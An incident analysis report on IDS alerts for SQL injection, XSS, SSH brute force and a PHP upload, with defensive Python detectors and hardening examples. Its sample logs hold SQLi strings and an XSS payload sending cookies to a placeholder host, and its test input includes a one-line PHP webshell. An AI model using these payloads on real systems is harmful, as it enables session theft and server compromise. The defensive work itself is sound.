Incident Analysis Report
Codename: Incident Webstorm-1125
Date of Detection: November 3, 2025
Analysts: Alacks Rabbi, Fapohunda Israel, Chioma Mbidom
Source: Intrusion Detection System (IDS) Logs
Classification: Confirmed External Attack Attempts
1. Executive Summary
Between 10:25 and 10:35 UTC on November 3, 2025, the organization's Intrusion Detection System (IDS)
recorded a sequence of alerts, several of high severity, directed at internal servers in the 10.0.0.x subnet.
The alerts indicated coordinated external intrusion attempts against web and SSH services: SQL injection,
cross-site scripting (XSS), SSH brute force, and a possible remote code execution attempt via a malicious
file upload. Taken together they are consistent with a structured attack chain that began with reconnaissance
and vulnerability probing and progressed to exploitation attempts aimed at gaining persistent access to the
network. The overall risk rating for this event is assessed as High because multiple critical alerts occurred
within a ten-minute window.
2. Incident Timeline

Timestamp (UTC) | Alert Description                             | Source IP | Destination IP | Severity | Potential Impact
----------------|-----------------------------------------------|-----------|----------------|----------|---------------------
10:25           | Possible SQL Injection attempt detected.      | -         | 10.0.0.20      | High     | Database compromise
10:27           | Suspicious POSTs with script tags (XSS).      | -         | 10.0.0.20      | Medium   | Credential theft
10:29           | Suspicious user-agent accessing admin pages.  | -         | 10.0.0.21      | Low      | Reconnaissance
10:32           | SSH login failures detected.                  | -         | 10.0.0.22      | High     | Unauthorized access
10:35           | Suspicious .php file upload detected.         | -         | 10.0.0.20      | High     | Webshell deployment
3. Technical Analysis
All suspicious traffic originated from external addresses in public ranges (-.x, -.x, and 192.0.2.x). Note
that 192.0.2.0/24 is the TEST-NET-1 block reserved for documentation, so the addresses shown in this report
should be read as placeholders rather than as the routable sources. No alerts matched outbound or internally
initiated traffic (from the 10.0.0.x or 192.168.x.x private ranges), which indicates an inbound intrusion
attempt from outside the organization's perimeter rather than activity from an already-compromised internal
host. The affected systems were the web application server (10.0.0.20), the administrative portal (10.0.0.21),
and the SSH server (10.0.0.22). The final file-upload alert strongly suggests an attempt to deploy a webshell
or remote access script, the attacker's next stage after scanning and exploitation testing. Whether the upload
actually landed on 10.0.0.20 cannot be established from the IDS alert alone; the server's upload directory and
web-server logs should be checked for the file and for any subsequent requests to it before the event is closed.
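To make the five alert classes in the timeline concrete, the following added example (not the organization's IDS or any vendor ruleset) runs simple signatures over constructed access-log and sshd lines and folds the hits into the same timestamp/source/destination/severity layout as section 2. The log formats, the signature patterns, the five-failure SSH threshold, the host address 10.0.0.22 for the sshd log, and the RFC 5737 source addresses are all assumptions made for the example; only the 192.0.2.x range is mentioned in the report.

```python
"""Toy IDS-style detector reproducing the Webstorm-1125 alert classes over
constructed sample logs.  Added example; formats, thresholds and source
addresses are assumptions, not the organisation's real data."""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote

SSH_HOST = "10.0.0.22"  # assumption: the sshd log below comes from this host

# Constructed web access log (simplified one-request-per-line format):
# time  dst_ip  src_ip  method  request  status  user-agent
WEB_LOG = """\
10:25:03 10.0.0.20 198.51.100.7 GET /products?id=1'%20OR%20'1'='1 200 Mozilla/5.0
10:25:09 10.0.0.20 198.51.100.7 GET /products?id=1%20UNION%20SELECT%20user,pass%20FROM%20users-- 500 Mozilla/5.0
10:27:41 10.0.0.20 203.0.113.9 POST /comment?text=%3Cscript%3Enew%20Image().src%3D%22http://203.0.113.9/c%3F%22%2Bdocument.cookie%3C/script%3E 200 Mozilla/5.0
10:29:15 10.0.0.21 192.0.2.44 GET /admin/ 403 sqlmap/1.7.2#stable
10:30:02 10.0.0.20 192.0.2.10 GET /index.html 200 Mozilla/5.0 (X11; Linux x86_64)
10:35:20 10.0.0.20 203.0.113.9 POST /upload?name=shell.php 200 Mozilla/5.0
"""

# Constructed sshd syslog lines for the SSH server.
SSH_LOG = """\
Nov  3 10:32:01 sshsrv sshd[1201]: Failed password for root from 192.0.2.44 port 50122 ssh2
Nov  3 10:32:02 sshsrv sshd[1203]: Failed password for root from 192.0.2.44 port 50123 ssh2
Nov  3 10:32:03 sshsrv sshd[1205]: Failed password for invalid user admin from 192.0.2.44 port 50124 ssh2
Nov  3 10:32:04 sshsrv sshd[1207]: Failed password for invalid user oracle from 192.0.2.44 port 50125 ssh2
Nov  3 10:32:05 sshsrv sshd[1209]: Failed password for root from 192.0.2.44 port 50126 ssh2
Nov  3 10:33:10 sshsrv sshd[1211]: Failed password for alice from 203.0.113.9 port 40001 ssh2
Nov  3 10:33:30 sshsrv sshd[1213]: Accepted publickey for alice from 10.0.0.5 port 40002 ssh2
"""

# Deliberately small signature set; real rulesets are far broader, and the
# `on...=` handler pattern below will also fire on benign parameter names.
SQLI_RE = re.compile(
    r"(?i)\bunion\b.*\bselect\b|'\s*or\s*'?\w+'?\s*=\s*'?\w+|;\s*(?:drop|insert|update|delete)\b|--\s*$")
XSS_RE = re.compile(r"(?i)<\s*script\b|javascript:|\bon[a-z]+\s*=")
SCANNER_UA_RE = re.compile(r"(?i)\b(?:sqlmap|nikto|nmap|masscan|python-requests)\b|^curl/")
PHP_EXT_RE = re.compile(r"(?i)\.ph(?:p\d?|tml|ar)\b")  # .php .php5 .phtml .phar
SSH_FAIL_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (\S+) port")


@dataclass
class Alert:
    time: str          # HH:MM, matching the report's timeline granularity
    description: str
    src: str
    dst: str
    severity: str
    impact: str


def classify_request(method, request, user_agent):
    """Map one request to (description, severity, impact), or None if benign."""
    req = unquote(request)  # decode %xx so encoded payloads are inspected in clear
    if SQLI_RE.search(req):
        return ("Possible SQL Injection attempt detected.", "High", "Database compromise")
    if XSS_RE.search(req):
        return ("Suspicious POST with script tags (XSS).", "Medium", "Credential theft")
    if method == "POST" and PHP_EXT_RE.search(req):
        return ("Suspicious .php file upload detected.", "High", "Webshell deployment")
    if req.startswith("/admin") and SCANNER_UA_RE.search(user_agent):
        return ("Suspicious user-agent accessing admin pages.", "Low", "Reconnaissance")
    return None


def detect_web(log):
    """One alert per (src, dst, description); repeats of the same probe are folded."""
    alerts = {}
    for line in log.splitlines():
        ts, dst, src, method, request, _status, ua = line.split(maxsplit=6)
        hit = classify_request(method, request, ua)
        if hit:
            alerts.setdefault((src, dst, hit[0]), Alert(ts[:5], hit[0], src, dst, hit[1], hit[2]))
    return list(alerts.values())


def detect_ssh(log, dst=SSH_HOST, threshold=5):
    """Flag sources with >= threshold failed password logins.  No sliding time
    window is applied here; a production detector would add one."""
    failures, first_seen = Counter(), {}
    for line in log.splitlines():
        m = SSH_FAIL_RE.match(line)
        if not m:
            continue  # successful logins and other sshd messages are ignored
        ts, src = m.groups()
        failures[src] += 1
        first_seen.setdefault(src, ts[-8:-3])  # HH:MM of the first failure
    return [Alert(first_seen[s], "SSH login failures detected.", s, dst, "High", "Unauthorized access")
            for s, n in failures.items() if n >= threshold]


def analyse(web_log, ssh_log):
    """Merge both detectors into a timeline ordered like section 2 of the report."""
    return sorted(detect_web(web_log) + detect_ssh(ssh_log), key=lambda a: a.time)


if __name__ == "__main__":
    print(*analyse(WEB_LOG, SSH_LOG), sep="\n")
```

Run on the constructed input, `analyse()` yields exactly the five timeline entries (10:25 SQLi, 10:27 XSS, 10:29 reconnaissance, 10:32 SSH, 10:35 upload) and no alert for the benign 10:30 request, the single failed login from 203.0.113.9, or the key-based login from 10.0.0.5. The fold in `detect_web` is why two SQLi probes from the same source appear as one 10:25 alert, which is how the report's timeline reads as well.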
4. Root Cause and Impact Assessment
Root Cause: Insufficient server-side input validation and missing upload controls in the web application
allowed injection and file upload attempts to reach the application. The SSH brute-force activity indicates
that password authentication is exposed to the internet without rate limiting or lockout.
Potential Impact: Database exfiltration, remote code execution on the web server, privilege escalation, or
lateral movement within the network.
5. Preventive and Corrective Actions

Control Area                   | Recommendation                                                                                      | Expected Benefit
-------------------------------|-----------------------------------------------------------------------------------------------------|-----------------------------------------------------------------
Web Application Firewall (WAF) | Deploy a WAF to block SQLi, XSS, and malicious file uploads.                                        | Blocks common web exploits (a compensating control, not a fix).
Input Validation & Encoding    | Use server-side validation, parameterized queries, and output encoding.                             | Removes injection and XSS flaws at the source.
File Upload Restrictions       | Allowlist file types, verify content, store uploads outside the web root with execution disabled.   | Prevents uploaded webshells from executing.
SSH Hardening                  | Enforce key-based login, disable password authentication, and deploy fail2ban.                      | Blocks brute-force attempts.
Network Segmentation           | Isolate web servers from internal systems.                                                          | Limits attack spread.
Threat Intelligence Blocking   | Block known malicious IPs.                                                                          | Stops repeat attacks from known sources.
Multi-Factor Authentication    | Require MFA for administrators.                                                                     | Strengthens login security.
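The input-validation and upload-restriction rows above are the ones that fix the root cause rather than screen it, so the following added example (constructed for this report, not the application's code) shows each of the three web-layer weaknesses next to its hardened form: a string-built SQL query beside a parameterized one, entity-encoded output for the XSS case, and an upload check that allowlists extensions, verifies magic bytes, and discards the client-supplied filename. The product table, the allowed types, and the size limit are assumptions; only the attack classes come from the report.

```python
"""Vulnerable-versus-hardened handling for the three web-layer weaknesses in the
root cause: SQL injection, XSS, and unrestricted file upload.  Added example
with constructed data; the vulnerable functions exist only for contrast."""
import html
import secrets
import sqlite3
from pathlib import PurePosixPath, PureWindowsPath


def setup_db():
    """In-memory product table standing in for the application database (assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget"), (3, "gizmo")])
    return conn


def lookup_vulnerable(conn, product_id):
    """The id= parameter is spliced straight into SQL: 1' OR '1'='1 dumps every row."""
    query = f"SELECT id, name FROM products WHERE id = '{product_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, product_id):
    """Parameter binding: the value travels separately from the statement, so
    quotes and keywords in the input can never change the query's structure."""
    return conn.execute("SELECT id, name FROM products WHERE id = ?",
                        (product_id,)).fetchall()


def render_comment(text):
    """Output encoding for the XSS case: entity-encode before embedding in HTML,
    so <script> arrives in the browser as text, not markup."""
    return f"<p>{html.escape(text, quote=True)}</p>"


# Allowlist of extensions and the magic bytes their content must start with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}


def validate_upload(filename, data, max_bytes=5 * 1024 * 1024):
    """Return (accepted, reason, stored_name).  The stored name is random, so the
    client-supplied name never reaches the filesystem; the caller must still
    write to a directory outside the web root with script execution disabled."""
    # Strip directory components written with either separator, plus NUL bytes.
    base = PureWindowsPath(PurePosixPath(filename).name).name.replace("\0", "")
    ext = PurePosixPath(base).suffix.lower()
    if not base or ext not in ALLOWED_TYPES:
        return False, "extension not allowed", None      # rejects shell.php, .phtml, ...
    if len(data) > max_bytes:
        return False, "file too large", None
    if not data.startswith(ALLOWED_TYPES[ext]):
        # Catches shell.php.png and any other mismatch between name and content.
        return False, "content does not match extension", None
    return True, "ok", secrets.token_hex(16) + ext


if __name__ == "__main__":
    db = setup_db()
    payload = "1' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))
    print("safe:      ", lookup_safe(db, payload))
    print(render_comment("<script>alert(1)</script>"))
    print(validate_upload("shell.php.png", b"<?php system($_GET['c']); ?>"))
```

The magic-byte check is what defeats the double-extension trick (`shell.php.png` passes the allowlist but its body starts with `<?php`), and the random stored name removes both path traversal and the attacker's ability to predict the webshell's URL. Neither check replaces the server-side configuration that denies script execution in the upload directory; they are layered on top of it.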
6. Lessons Learned and Conclusion
Incident Webstorm-1125 highlights the importance of defense-in-depth and proactive monitoring. While the
IDS successfully detected multiple attack phases, the event exposed weaknesses in application-layer
security and SSH access management. No internal compromise was confirmed, but the presence of a
suspicious file upload underscores the need for immediate remediation of the upload handling, continuous
monitoring, and stronger preventive controls. Implementing a WAF, stricter input validation, and SSH
hardening will reduce both the likelihood and the impact of similar incidents in the future.
Prepared by: Alacks Rabbi, Fapohunda Israel, Chioma Mbidom
Date: November 12, 2025